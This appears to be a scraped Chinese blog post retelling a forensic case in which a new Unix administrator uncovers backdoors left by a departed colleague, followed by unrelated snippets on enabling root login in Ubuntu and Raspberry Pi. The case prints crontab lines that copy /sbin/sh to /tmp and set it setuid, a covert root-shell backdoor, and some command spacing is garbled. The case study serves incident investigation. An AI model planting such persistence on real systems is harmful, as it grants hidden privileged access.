真假Root賬號

2021-09-04 21:06:31 字數 1453 閱讀 2835

真假

root

賬號

本案例**於《unix/linux網路日誌分析與流量監控》一書,主要講述了新老管理員在unix伺服器交接時,新任管理員發現了系統的passwd、shadow均被修改,隨後管理員開始深入調查,更多的問題浮出水面,到底那台伺服器被做過什麼「手腳」呢?

難度係數:★★★★

故事人物:趙雲(新任管理員) 曉東(離職管理員)

下面這個例子為大家介紹了國內一家大型生物製藥公司,該公司業務系統主要以unix/linxu系統為主,資訊部系統管理員離職後給公司帶來的困擾問題,其中有技術問題,同時也有管理問題。

事件背景

某日,王經理就收到了資訊部系統管理員曉東的離職信,理由簡單到他都想不到,後來得知他去了公司的競爭對手那裡從事系統管理。這時,王經理讓新來的管理員趙雲,去做好交接工作。

整個交接,非常順利,也很愉快。同時給新網管已到密令--讓他查詢系統是否有後門或漏洞。逐一清理查詢問題,在眾多的unix伺服器和windows伺服器裡確實是一件難事。

下面遇到的問題就是對重要unix伺服器查詢出的問題。首先趙雲從終端登入系統,以便記錄這台計算機上所有的擊鍵,並把它們記錄到乙個日誌檔案中以備以後的分析。趙雲心裡知道用乙個普通使用者的賬號不可能做很多事,所以他想先檢視一些系統重啟後容易丟失的資料。

這是他觀察到上圖中紅色框中的檔案,很顯然被修改過,不時冒出一頭冷汗,難道會在系統中新增其他賬號,如果有另乙個root存在,那系統安全可就保不住了。

趙雲立即意識到這個系統可能存在乙個,也可能是兩個後門,他決定著手把它們都逐一挖掘出來。

他先把這個後門放在一邊,然後從乙個遠端的主機與它進行連線。

很快第2個root賬號很快就被發現了,但是很容易被忽視,這時他決定將注意力集中在對crontab的神秘的修改—上:

# exporteditor=vi

# crontab -eroot

30 1 * * 0 cp/sbin/sh /tmp/tmp1138

31 1 * * 0 chmodu+s /tmp/tmp1138

看來有人想在/tmp目錄下留乙個root shell ,他猜想這個系統中還有其他賬號。

解鎖樹莓派root賬號

pi raspberrypi sudo passwd root enter new unix password 輸入第一遍密碼 retype new unix password 輸入第二遍密碼 啟用 root 賬號登入 pi raspberrypi sudo passwd unlock root p...

Ubuntu 關於使用 root 賬號登入

本文驗證環境為 ubuntu 14.04 和 lubuntu 13.04 ubuntu 維護者們認為實在沒有必要使用 root 帳戶,因為你想做的所有事情管理員都可以完成,管理員只需使用 sudo 命令即可。但是如果你不想每次都輸入 sudo 或者堅持要使用 root 賬號來做某些事情,你最好的選擇...

Ubuntu 開啟root賬號SSH登入

ubuntu為了安全考慮,預設沒有開啟root賬號訪問,使用者一般都使用自己的賬號登入系統,通過sudo的方式執行一些需要root許可權的命令。為了開啟root賬戶的ssh訪問,我們首先得啟用root賬戶。只需要像下面這樣,給root賬戶設定個密碼即可。sudo passwd root然後,我們還希...